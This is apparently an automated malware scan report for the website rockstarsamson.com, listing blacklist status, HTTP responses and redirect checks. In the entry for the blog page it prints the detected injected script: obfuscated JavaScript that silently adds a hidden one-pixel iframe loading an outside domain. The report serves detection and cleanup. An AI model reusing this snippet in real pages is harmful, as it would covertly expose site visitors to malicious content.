Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rockstarsamson.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://rockstarsamson.com/ | HTTP/1.1 302 Found Cache-Control: no-cache, no-store, must-revalidate, max-age=0 Connection: close Date: Thu, 28 Aug 2014 23:56:12 GMT Location: http://www.rockstarsamson.com/blog Server: LiteSpeed Content-Length: 1148 Content-Type: text/html | clean |
http://www.rockstarsamson.com/blog | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 23:56:12 GMT Location: http://www.rockstarsamson.com/blog/ Server: LiteSpeed Content-Length: 1172 Content-Type: text/html | clean |
http://www.rockstarsamson.com/blog/ | 200 OK Content-Length: 9195 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) e=String.fromCharCode;if(typeof(hlwhk)==e(117,110,100,101,102,105,110,101,100)){hlwhk=1;c=document;n=c[e(99,114,101,97,116,101,69,108,101,109,101,110,116)](e(105,102,114,97,109,101));n[e(115,114,99)]=e(104,116,116,112,58,47,47,108,117,112,121,116,101,104,111,113,46,99,111,109,47,118,56,55,50,121,51,46,104,116,109);n[e(119,105,100,116,104)]=1;n[e(104,101,105,103,104,116)]=1;n[e(102,114,97,109,101,66,111,114,100,101,114)]=0;c[e(98,111,100,121)][e(97,112,112,101,110,100,67,104,105,108,100)](n);} Antivirus reports:
| ||
http://www.flickr.com/badge_code.gne?nsid=92201830@N00&count=6&display=random&name=0&size=square&raw=1 | 200 OK Content-Length: 1169 Content-Type: text/html | clean |
http://www.flickr.com/photos/erikarenee/312992835/ | HTTP/1.1 302 Found Cache-Control: private Connection: close Date: Thu, 28 Aug 2014 23:56:24 GMT Via: http/1.1 fts108.flickr.bf1.yahoo.com (ApacheTrafficServer/4.0.2 [cMsSf ]), http/1.1 r04.ycpi.dee.yahoo.net (ApacheTrafficServer [cMsSf ]) Age: 0 Location: https://www.flickr.com/photos/erikarenee/312992835/ Server: ATS Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: BX=fm0c2nd9vvgd8&b=3&s=uv; expires=Sun, 28-Aug-2016 23:56:24 GMT; path=/; domain=.flickr.com Set-Cookie: xb=275065; expires=Sun, 28-Aug-2016 23:56:24 GMT; path=/; domain=.flickr.com X-Content-Type-Options: NOSNIFF X-Served-By: www265.flickr.bf1.yahoo.com | clean |
https://www.flickr.com/photos/erikarenee/312992835/ | 200 OK Content-Length: 173508 Content-Type: text/html | clean |
https://s.yimg.com/pw/combo/1/3.11.0?j/yui/3.11.0/yui/yui-.E.A.v2&j/yui/3.11.0/.FN/.FN-.E.A.vX&j/lighthouse.A.v47RzvUr | 200 OK Content-Length: 150436 Content-Type: application/x-javascript | clean |
https://s.yimg.com/uv/dm/ad-ros-0.0.2.js | 200 OK Content-Length: 3119 Content-Type: application/x-javascript | clean |
https://s.yimg.com/zz/combo?kx/yucs/uh3/uh/1078/js/uh-min.js&kx/yucs/uh3/uh/1078/js/menu_utils_v3-min.js&kx/yucs/uhc/meta/16/js/meta-min.js&kx/yucs/uh3/top-bar/321/js/top_bar_v3-min.js | 200 OK Content-Length: 14622 Content-Type: application/javascript | clean |
https://www.flickr.com/ | 200 OK Content-Length: 163543 Content-Type: text/html | clean |
https://s.yimg.com/pw/combo/1/3.11.0?j/yui/3.11.0/yui/yui-.E.A.v2&j/yui/3.11.0/.FN/.FN-.E.A.vX | 200 OK Content-Length: 140247 Content-Type: application/x-javascript | clean |
https://www.flickr.com/signin/ | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, private Cache-Control: post-check=0, pre-check=0 Connection: close Date: Thu, 28 Aug 2014 23:56:35 GMT Pragma: no-cache Via: http/1.1 fts124.flickr.bf1.yahoo.com (ApacheTrafficServer/4.0.2 [cMsSf ]), http/1.1 r11.ycpi.ams.yahoo.net (ApacheTrafficServer [cMsSf ]) Age: 0 Location: https://login.yahoo.com/config/login?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c%3DH6T9XcS72e4mRnW3NpTAiU8ZkA--&.intl=lt&.lang=en&mg=1&.done=https%3A%2F%2Flogin.yahoo.com%2Fconfig%2Fvalidate%3F.src%3Dflickrsignin%26.pc%3D8190%26.scrumb%3D0%26.pd%3Dc%253DJvVF95K62e6PzdPu7MBv2V8-%26.intl%3Dlt%26.done%3Dhttps%253A%252F%252Fwww.flickr.com%252Fsignin%252Fyahoo%252F Server: ATS Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Thu, 28 Aug 2014 23:56:35 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: BX=0pu58n59vvgdj&b=3&s=pg; expires=Sun, 28-Aug-2016 23:56:35 GMT; path=/; domain=.flickr.com Set-Cookie: xb=005029; expires=Sun, 28-Aug-2016 23:56:35 GMT; path=/; domain=.flickr.com Set-Cookie: localization=en-us%3Bxx%3Blt; expires=Thu, 25-Aug-2016 23:56:35 GMT; path=/; domain=.flickr.com Set-Cookie: flrb=53; expires=Fri, 29-Aug-2014 01:56:35 GMT; path=/; domain=.flickr.com; httponly X-Content-Type-Options: NOSNIFF X-Served-By: www335.flickr.bf1.yahoo.com | clean |
https://login.yahoo.com/config/login?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c%3dh6t9xcs72e4mrnw3nptaiu8zka--&.intl=lt&.lang=en&mg=1&.done=https%3a%2f%2flogin.yahoo.com%2fconfig%2fvalidate%3f.src%3dflickrsignin%26.pc%3d8190%26.scrumb%3d0%26.pd%3dc%253djvvf95k62e6pzdpu7mbv2v8-%26.intl%3dlt%26.done%3dhttps%253a%252f%252fwww.flickr.com%252fsignin%252fyahoo%252f | 200 OK Content-Length: 140706 Content-Type: text/html | clean |
https://s.yimg.com/zz/combo?yui:2.8.2/build/yahoo-dom-event/yahoo-dom-event.js | 200 OK Content-Length: 36977 Content-Type: application/javascript | clean |
https://s.yimg.com/zz/combo?yui:2.8.2/build/yahoo-dom-event/yahoo-dom-event.js&yui:2.8.2/build/animation/animation-min.js&yui:2.8.2/build/connection/connection_core-min.js&sf/l/2.6.66/j/centerIframe-min.js&sf/l/2.6.65/j/capslock_ui-min.js&sf/l/2.6.65/j/login_md5-min.js | 200 OK Content-Length: 67058 Content-Type: application/javascript | clean |
https://s.yimg.com/lq/lib/reg/js/yahoo_container-min_json-min_connection_main-min-new.js | 200 OK Content-Length: 132448 Content-Type: application/javascript | clean |
https://s.yimg.com/rq/darla/2-7-5/js/g-r-min.js | 200 OK Content-Length: 120649 Content-Type: application/x-javascript | clean |
http://www.flickr.com/test404page.js | HTTP/1.1 302 Found Cache-Control: private Connection: close Date: Thu, 28 Aug 2014 23:56:43 GMT Via: http/1.1 fts121.flickr.bf1.yahoo.com (ApacheTrafficServer/4.0.2 [cMsSf ]), http/1.1 r09.ycpi.ams.yahoo.net (ApacheTrafficServer [cMsSf ]) Age: 0 Location: https://www.flickr.com/test404page.js Server: ATS Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: BX=eiads199vvgdr&b=3&s=1v; expires=Sun, 28-Aug-2016 23:56:43 GMT; path=/; domain=.flickr.com Set-Cookie: xb=062753; expires=Sun, 28-Aug-2016 23:56:43 GMT; path=/; domain=.flickr.com X-Content-Type-Options: NOSNIFF X-Served-By: www42.flickr.bf1.yahoo.com | clean |
https://www.flickr.com/test404page.js | 404 Not Found Content-Length: 107114 Content-Type: text/html | clean |
https://s.yimg.com/pw/javascript/global.js.v2055206793.37 | 200 OK Content-Length: 58322 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rockstarsamson.com
Result:
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Connection: close
Date: Thu, 28 Aug 2014 23:56:12 GMT
Location: http://www.rockstarsamson.com/blog
Server: LiteSpeed
Content-Length: 1148
Content-Type: text/html
...1148 bytes of data.
GET / HTTP/1.1
Host: rockstarsamson.com
Result:
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Connection: close
Date: Thu, 28 Aug 2014 23:56:12 GMT
Location: http://www.rockstarsamson.com/blog
Server: LiteSpeed
Content-Length: 1148
Content-Type: text/html
...1148 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: rockstarsamson.com
Referer: http://www.google.com/search?q=rockstarsamson.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rockstarsamson.com
Referer: http://www.google.com/search?q=rockstarsamson.com
Result:
The result is similar to the first query. There are no suspicious redirects found.